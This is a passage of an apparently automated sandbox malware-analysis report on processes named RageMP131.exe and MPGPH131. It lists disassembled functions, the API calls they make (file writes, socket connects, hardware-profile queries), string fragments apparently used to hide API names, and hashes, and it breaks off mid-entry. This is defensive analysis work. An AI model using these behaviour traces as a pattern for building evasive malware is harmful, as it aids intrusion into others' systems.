Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
Instruction ID: d43c678ab274cd5761bc621903ce1687b7dd8f9cdfc7598ea336ea5eddfe6553
Opcode Fuzzy Hash: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
Instruction Fuzzy Hash: 11C1E671D10649CFEB08CF68CC85BEDBBB9BF55304F148298E4046B692DB78AAC5CB51

Function 00AB7DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB8051
___std_exception_destroy.LIBVCRUNTIME ref: 00AB8060

Strings

[json.exception., xrefs: 00AB7E1C

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
Instruction ID: 8630a06e8e2aee912fb94001f68de88b748274701d2cecdcd5d6f867610bb145
Opcode Fuzzy Hash: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
Instruction Fuzzy Hash: 9A91F8719002489FDB18DFA8CC85BEEFBB5FF55310F14425DE410AB6A2D7B4AA84C791

Function 00AB3A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F

Strings

ios_base::badbit set, xrefs: 00AB3BA7, 00AB3BD2, 00AB3BF3
ios_base::failbit set, xrefs: 00AB3AC8

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
Instruction ID: be276cec5dc05ded2f634cad82330c0762826ef62bacea1f31943f58c96ac631
Opcode Fuzzy Hash: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
Instruction Fuzzy Hash: 5541E5B2910604ABCB04DF59CC45BEEFBFCEF45310F14826AF91597682E774AA40CBA1

Function 00B23850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00B240B9
___std_exception_destroy.LIBVCRUNTIME ref: 00B240D2
___std_exception_destroy.LIBVCRUNTIME ref: 00B24BDD
___std_exception_destroy.LIBVCRUNTIME ref: 00B24BF6

Strings

value, xrefs: 00B24B03

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
Instruction ID: f2c99f6967256b9b97284373e9eb589a1602f4c6bdbc425da636aecb584304a6
Opcode Fuzzy Hash: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
Instruction Fuzzy Hash: B651A270C00258DBDB14DFA8DC89BEEBBF4AF05304F144299E449A7792D7B46A88CF91

Function 00B28CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B28D11

Strings

type must be boolean, but is , xrefs: 00B28E02
type must be string, but is , xrefs: 00B28D78

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
Instruction ID: 61882282c4163500b2b5feb6d8c40b7bf04a05eb4ccf10286768d0b7e81822ca
Opcode Fuzzy Hash: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
Instruction Fuzzy Hash: 7F3119B5900144AFDB14EBA4E842BDDB7E9EB14700F1006F9F419977D2EF74A948C752

Analysis Process: RageMP131.exePID: 7848, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	247
Total number of Limit Nodes:	39

Executed Functions

Function 00B60044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00B60223

Strings

el32, xrefs: 00B600FB
GetM, xrefs: 00B600B6
Kern, xrefs: 00B600F4
Writ, xrefs: 00B60148
xRp.exe, xrefs: 00B601FD, 00B60200
Clos, xrefs: 00B60129
dleA, xrefs: 00B600D0
athA, xrefs: 00B60199
WinE, xrefs: 00B60110
catA, xrefs: 00B601AF
lstr, xrefs: 00B601A7
GetT, xrefs: 00B60188
.dll, xrefs: 00B60102
odul, xrefs: 00B6022D
Crea, xrefs: 00B60169

Memory Dump Source

Source File: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
API String ID: 823142352-2378254480
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: c175cf7e62359e322fd0410336ddb39b1901080d65975b1861dbf803efc8450c
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 0D611874D21219DBCF24DF95C884AAEB7B0FF55715F2482AAE405BB201C3789E81CB91

Function 005DD620 Relevance: 6.1, APIs: 4, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 005DD64B
socket.WS2_32(?,?,?,?,?,?,006F50C8,?,?), ref: 005DD6EE
connect.WS2_32(00000000,?,?,?,?,?,006F50C8,?,?), ref: 005DD702
closesocket.WS2_32(00000000), ref: 005DD70D

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID:
API String ID: 3098855095-0
Opcode ID: 27fe9f77c816e25a574515f658307dfd7bda60df6dbf0610751aacd63f692a75
Instruction ID: ff3f5b92fcd329b4dab1d93a8d81479363bc86294ef1b1d723f5a2d9ac4fa3ba
Opcode Fuzzy Hash: 27fe9f77c816e25a574515f658307dfd7bda60df6dbf0610751aacd63f692a75
Instruction Fuzzy Hash: E131D5725053555BD7209F688C84B6FBBE5FFC9374F001F5BF9A8A22D0E730990586A2

Function 0511053A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kZXZ, xrefs: 05110554

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID: kZXZ
API String ID: 0-1435790286
Opcode ID: 9d0b2b36955fe0553042869ed81c60cf82e48ae1e41328733668d6754eb5d1e6
Instruction ID: d0cbdcdead12994cbdd86a331af5e123abec8add652f8ffec1d1116e3e1f7ba3
Opcode Fuzzy Hash: 9d0b2b36955fe0553042869ed81c60cf82e48ae1e41328733668d6754eb5d1e6
Instruction Fuzzy Hash: 803115EBA0C115EF616AE1425B5CAF6266FE6DE77073284B6FC07C6101E3944AC9843C

Function 0511054E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kZXZ, xrefs: 05110554

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID: kZXZ
API String ID: 2104809126-1435790286
Opcode ID: 5b66e8d49f433a1e6a45005cc922a805f7c731adc95b53a21ad73db10b44c260
Instruction ID: 12da2aeb4bb4d6cd9d807e66e8cbd527f9752fa21b57153287cb0c65a25003c2
Opcode Fuzzy Hash: 5b66e8d49f433a1e6a45005cc922a805f7c731adc95b53a21ad73db10b44c260
Instruction Fuzzy Hash: 8A3124EBA0C115EFA16AE0425B6CAF6266FE6DE77073284B6FC47C6101E3944AC5843C

Function 05110430 Relevance: 1.8, APIs: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a081350e1fcbde9e6912d4a31d64dc80923f29980831a16d4caeb0b12a9348
Instruction ID: f335438cb9d09efafeada8f70ef66937b07a0e4b5b8980de59a471cefe141920
Opcode Fuzzy Hash: 57a081350e1fcbde9e6912d4a31d64dc80923f29980831a16d4caeb0b12a9348
Instruction Fuzzy Hash: 876128E7A0C110AFA266D1452B5C9F62B6FE6DE73073284FAFC47C6502D3944ECA8139

Function 0511046B Relevance: 1.7, APIs: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d27356a6c18b33b88446f5f0eb7efaf40e024d97df66c24de63fde99443a5d
Instruction ID: 2279d5d58ed1cfe4a68c220f6984a17a7d92c4ea034c11ceeb3b1c9e9a182d14
Opcode Fuzzy Hash: a9d27356a6c18b33b88446f5f0eb7efaf40e024d97df66c24de63fde99443a5d
Instruction Fuzzy Hash: 5141E5E7A0C115EF616AD1426B5CAF6666FE6DE73073284B6FC07C6502E3944EC9803D

Function 0511047D Relevance: 1.7, APIs: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f672b624788f7253a05770357fa5ebfc7c12fb7606b140d17f61ee60c445727b
Instruction ID: 429da81a5e7c302a8c67d848bdb1dd82e116e054da25147936a8fec80323fa53
Opcode Fuzzy Hash: f672b624788f7253a05770357fa5ebfc7c12fb7606b140d17f61ee60c445727b
Instruction Fuzzy Hash: B041F4E7A0C215EF6169D1426B5C9F6266FE6DA73073284B6FC07C6102E3944EC98439

Function 051104A1 Relevance: 1.7, APIs: 1, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6128760e9f9037136d9000d61d3e7ce64a6b923a166bcc3f28abf791046f3c4c
Instruction ID: 3e451c39647f57cf677c02bb732cef167b30dbae4ea279a0f0fa9df2bbca9972
Opcode Fuzzy Hash: 6128760e9f9037136d9000d61d3e7ce64a6b923a166bcc3f28abf791046f3c4c
Instruction Fuzzy Hash: 5E41F2EBA0C115EE6169D0422B1CAF7266FE6DE73073284B6FC07C6102E3944EC98439

Function 051104CB Relevance: 1.7, APIs: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e4519ea1cbd4c0cbaa3e8836559bc0d5df53328e6f6529c51dd69825cb565658
Instruction ID: bebbfe7708016b250d52f6af861a711f7cdf7fdb3743c70508628bef24080558
Opcode Fuzzy Hash: e4519ea1cbd4c0cbaa3e8836559bc0d5df53328e6f6529c51dd69825cb565658
Instruction Fuzzy Hash: 8341CFEBA0C115EE616AD0426B5CAF7666FE6DE73073284B6FC07C6101E3944EC98539

Function 051104D5 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1a7261b27ed90c8707c4284b967a81235336fe9575117f8884c3cd73c4c14ea2
Instruction ID: 2949a0ce3fd73bf9cd347904bd6e37cecf9bcc8e9db56f777d192d50385b83a7
Opcode Fuzzy Hash: 1a7261b27ed90c8707c4284b967a81235336fe9575117f8884c3cd73c4c14ea2
Instruction Fuzzy Hash: 4441F2EBA0C115FE616AD1826B1CAF6666FE6DE73073284B6FC07C6101E3944AC9853D

Function 006B21BC Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,006A5DA7,?,00000000,00000000,00000000,?,00000000,?,0069B2D2,006A5DA7,00000000,0069B2D2,?,?), ref: 006B2341

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 7fe570ffbb82268ad34dfb02e0ca82f8fd3cbce14b2f7a8ab03ced80b1037c63
Instruction ID: 26eb3e4f34d8c3c887fc17e1baeb95857241cb04641a797042f8f6e613cd7f2b
Opcode Fuzzy Hash: 7fe570ffbb82268ad34dfb02e0ca82f8fd3cbce14b2f7a8ab03ced80b1037c63
Instruction Fuzzy Hash: 3161B6B1D0411AAFDF15DFA8C894AFE7BFBAF09304F140149E900AB215D776DA91CBA4

Function 051104EC Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1ec7353e4cc96de648ec691d860585b81f9098db540c13ede53799c84c87f29a
Instruction ID: 63408da87767b406039a0e42adda4f216a7112858632c681ee98d50e689f4f74
Opcode Fuzzy Hash: 1ec7353e4cc96de648ec691d860585b81f9098db540c13ede53799c84c87f29a
Instruction Fuzzy Hash: 0D4113E7A0C105EF616AD0426B2CAF7266FE6DE77073284B6FC07C6101E3A44AC5803C

Function 0511051B Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: dee794fcec4c1ec8c91a079ea0b770c4ad2b9bd71d040e10d0671afe09d20e5d
Instruction ID: 235878450308bb7fa0234f0e37a4e2ec71ff2ccb1f1b825665054cbacbeabaad
Opcode Fuzzy Hash: dee794fcec4c1ec8c91a079ea0b770c4ad2b9bd71d040e10d0671afe09d20e5d
Instruction Fuzzy Hash: 813114E7A0C115EF616AE0426B5CAF6276FE6DE77073284B6FC47CA141E3940AC9843D

Function 0511050F Relevance: 1.7, APIs: 1, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1de15522642c08ca30b6178d93e716d1b6e9955fbfb49e8b0ea6dea58ab5fe58
Instruction ID: 32c04e677a2ce3e0e8c7967c14472980b9984d2aa3b968e29a81a2bdfbb3cc82
